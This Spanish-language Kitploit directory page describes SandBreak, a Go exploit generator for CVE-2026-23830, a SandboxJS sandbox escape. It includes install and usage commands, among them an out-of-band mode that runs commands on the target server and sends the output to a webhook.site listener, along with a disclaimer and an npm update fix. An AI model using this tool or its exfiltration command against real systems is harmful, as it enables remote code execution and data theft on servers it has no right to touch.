Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23830-SandBreak — Genera y entrega payloads de explotación para CVE-2026-23830, una evasión de SandboxJS, con modos para exfiltración OOB ciega y PoC de calc local. Admite listeners HTTP/HTTPS y produce payloads de JavaScript minificados. | Kitploit
Herramientas/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

Genera y entrega payloads de explotación para CVE-2026-23830, una evasión de SandboxJS, con modos para exfiltración OOB ciega y PoC de calc local. Admite listeners HTTP/HTTPS y produce payloads de JavaScript minificados.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
1hace 6 mesesAún no revisado
Compartir

SandBreak

Generador de Exploits CVE-2026-23830 y Herramienta Auto-Pwn

Go Version License Type

SandBreak es una herramienta robusta de generación de exploits basada en Go, diseñada para aprovechar la vulnerabilidad de escape de SandboxJS (CVE-2026-23830).

Esta herramienta explota el constructor AsyncFunction sin protección en versiones antiguas de sandboxjs, permitiendo a los atacantes salir del entorno sandbox de V8 y ejecutar código arbitrario en el sistema host. Soporta múltiples modos de payload, incluyendo Exfiltración OOB Ciega, Defacement y RCE Basado en Errores.


Características

  • 2 Modos de Ataque:
    • oob: Exfiltración de datos fuera de banda (HTTP/HTTPS) para escenarios ciegos.
  • calc: Abre calc.exe (PoC clásico).
  • OOB Inteligente: Detecta automáticamente HTTP vs HTTPS para evitar fallos del servidor.
  • Basado en Go: Binario único, sin dependencias requeridas en la máquina del atacante.
  • Ligero: Genera payloads de JavaScript puros y minificados.

  • Instalación

    Clona el repositorio y ejecuta:

    root@kitploit:~
    git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
    cd CVE-2026-23830-SandBreak
    go run CVE-2026-23830.go
    

    Uso

    root@kitploit:~
    go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
    

    1. Modo OOB (RCE Ciego - Profesional)

    Úsalo cuando no tengas retroalimentación de salida. Ejecuta el comando y envía el resultado codificado en Base64 a tu listener (por ejemplo, webhook.site).

    root@kitploit:~
    go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
    

    Omite con éxito los fallos básicos de filtrado de egreso manejando errores de red.

    2. Modo Calc (Prueba Local)

    Abre una calculadora en el servidor Windows.

    root@kitploit:~
    go run CVE-2026-23830.go -mode calc
    

    Prueba de Concepto (PoC)

    Escenario: Exfiltración OOB

    El atacante recibe los datos del usuario del servidor a través de Webhook a pesar de no haber salida visual en el sitio.


    Aviso Legal

    Esta herramienta está creada únicamente con Fines Educativos y para Pruebas de Penetración Autorizadas.

    • No uses esta herramienta en sistemas que no poseas o para los cuales no tengas permiso explícito de prueba.
    • El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.

    Mitigación

    Actualiza sandboxjs a la última versión donde el constructor AsyncFunction esté correctamente aislado en sandbox.

    root@kitploit:~
    npm update sandboxjs
    

    Autor: Meysam Bal-afkan

    Licencia: MIT

    Descargar herramienta